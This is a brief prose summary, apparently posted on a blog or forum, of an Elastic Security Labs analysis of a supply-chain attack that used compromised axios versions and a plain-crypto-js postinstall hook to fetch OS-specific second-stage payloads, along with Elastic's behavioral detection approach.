Elastic Security Labs has identified a supply-chain attack targeting the popular axios package through compromised versions 1.14.1 and 0.30.4. The attack avoids direct modification of the primary package, instead utilizing a transitive dependency called plain-crypto-js to trigger malicious execution during the postinstall phase. This cross-platform campaign impacts Linux, Windows, and macOS systems by spawning native shells to retrieve and execute second-stage payloads, such as Python-based RATs, PowerShell scripts, and Mach-O backdoors.
The analysis highlights that while the payloads vary by operating system, the delivery mechanism remains consistent: a Node.js process initiates an OS-native execution path to fetch remote content and detach it from the parent process. Elastic provides several behavioral detection rules to counter these tactics, focusing on process ancestry and suspicious network retrievals rather than static indicators. The report concludes with detailed Indicators of Compromise (IOCs), including C2 domains, file hashes, and specific registry keys used for persistence.
Top comments (0)